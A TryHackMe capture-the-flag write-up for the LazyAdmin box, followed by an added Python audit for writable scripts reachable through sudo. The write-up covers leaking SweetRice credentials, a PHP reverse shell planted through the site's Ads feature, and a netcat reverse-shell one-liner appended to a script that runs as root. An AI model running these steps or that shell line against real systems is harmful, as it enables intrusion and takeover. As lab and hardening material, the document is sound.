LazyAdmin (THM)
TryHackMe – LazyAdmin Write-Up
topics: Web application security, public exploits, PHP RCE through misconfigured website (OWASP), Linux Privilege Escalation
contents: Enumeration, Local Privilege Escalation, Root Privilege Escalation
tools: nmapAutomator, dirsearch, searchsploit, Kali PHP reverse shell, perl, sudo
Enumeration
Initial nmap scan:
../.autonmap.sh $ip Full
We have two ports open, SSH and HTTP. There is a default Apache homepage, so let's run a dirsearch scan:
python3 dirsearch.py -u $ip -e php,html,txt
There is one unique directory on the website, content; navigating to it reveals a website running SweetRice. Checking with searchsploit reveals several public exploits for SweetRice.
There appear to be several methods by which we'll be able to achieve local access. At first I looked at the "Arbitrary File Upload" program, but it requires credentials. The "Backup Disclosure" text file reveals a file location that houses the site credentials.
The site is hosted under the /content directory, so we'll have to check /content/inc/mysql_backup.
This .sql file contains credentials for the website; cracking the password hash reveals the credentials manager:Password123.
Returning to the Python program with these credentials, it does not execute properly, and it gives no error message to troubleshoot. However, the code mentions a login page at /as.
Local Privilege Escalation
While we're aware of the login page, I went back through the searchsploit options, focusing next on PHP RCE now that we have credentials.
This means that within the Ads section of the website dashboard, we'll be able to include PHP code that executes a system shell. I used the code from the default Kali PHP reverse shell and created a new Ad.
The instructions mention that the shell will be located at /sweetrice/inc/ads/hacked.php; for us it is /content/inc/ads/ww.php. Navigating to that location while listening for the shell provides local access to the box.
Root Privilege Escalation
As always with Linux boxes, sudo -l
We do not have the password of the current user, www-data, so we'll be unable to execute a shell through Perl with sudo perl -e 'exec "/bin/sh";'.
Instead, we also have sudo permissions for a Perl program in another user's home folder; let's check its contents.
We have read/write permissions on this file, meaning we can edit it to include the attacking address. Add a new line with the attacking address and listen for the shell; it will attempt to connect to the first IP address and will take a minute to connect.
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.6.18.145 5554 >/tmp/f' >> copy.sh
sudo /usr/bin/perl /home/itguy/backup.pl
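Added hardening check, not part of the original write-up: a Python audit that models the root step above (a sudo-permitted Perl script that executes a second file the low-privileged user can modify) and flags every invoked path that is group- or world-writable. The names backup.pl and copy.sh come from the write-up; the file layout, modes and temp-directory paths are constructed for the demonstration.

```python
"""Hardening check (added example, not from the write-up): flag a sudo-permitted
Perl script that executes files other users can modify. Uses constructed temp files."""
import os
import re
import stat
import tempfile

# Perl constructs that pass a command to the shell: system(...), exec(...), `...`
CALL_RE = re.compile(r'(?:system|exec)\s*\(?\s*["\']([^"\']+)["\']|`([^`]+)`')

def referenced_paths(script_text):
    """Executable path (first token) of each shell call found in a Perl script."""
    paths = []
    for m in CALL_RE.finditer(script_text):
        tokens = (m.group(1) or m.group(2)).split()
        if tokens:
            paths.append(tokens[0])
    return paths

def group_or_world_writable(path):
    """True if the mode bits let the group or anyone else modify the file."""
    return bool(os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit_sudo_script(script_path):
    """Return the sudo target and every file it invokes that a non-owner could rewrite.
    Any hit means the holder of the sudo rule can edit what root will execute."""
    with open(script_path) as fh:
        candidates = [script_path] + referenced_paths(fh.read())
    return [p for p in candidates if os.path.exists(p) and group_or_world_writable(p)]

def build_demo():
    """Constructed LazyAdmin-style layout: backup.pl (sudo target) calls copy.sh."""
    d = tempfile.mkdtemp()
    helper = os.path.join(d, "copy.sh")
    backup = os.path.join(d, "backup.pl")
    with open(helper, "w") as fh:
        fh.write("#!/bin/bash\n# constructed helper that backup.pl runs as root\n")
    with open(backup, "w") as fh:
        fh.write('#!/usr/bin/perl\nsystem("%s");\n' % helper)
    os.chmod(helper, 0o666)  # the flaw: anyone can rewrite what root will execute
    os.chmod(backup, 0o644)  # the sudo target itself is fine
    return backup, helper

if __name__ == "__main__":
    backup, helper = build_demo()
    for finding in audit_sudo_script(backup):
        print("writable by non-owner, run as root via sudo:", finding)
```

Fixing the finding means making copy.sh root-owned and mode 0755 (or 0700), the same rule that should apply to backup.pl itself and anything else the sudo rule reaches.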